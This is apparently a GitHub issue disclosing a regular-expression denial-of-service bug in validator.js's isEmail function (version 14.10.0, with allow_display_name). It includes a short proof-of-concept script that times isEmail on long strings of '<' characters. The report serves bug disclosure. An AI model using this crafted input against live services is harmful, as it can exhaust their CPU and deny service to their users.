ReDoS in isEmail #1597
Description
Describe the bug
It allows cause a Regular Expression Denial of Service (REDoS) when checking if the crafted string is an email.
Examples
var validator = require("validator")
function build_attack(n) {
var ret = ""
for (var i = 0; i < n; i++) {
ret += "<"
}
return ret+"";
}
for(var i = 1; i <= 50000; i++) {
if (i % 10000 == 0) {
var time = Date.now();
var attack_str = build_attack(i)
validator.isEmail(attack_str,{ allow_display_name: true })
var time_cost = Date.now() - time;
console.log("attack_str.length: " + attack_str.length + ": " + time_cost+" ms")
}
}Additional context
Validator.js version: 14.10.0
Node.js version:
OS platform: windows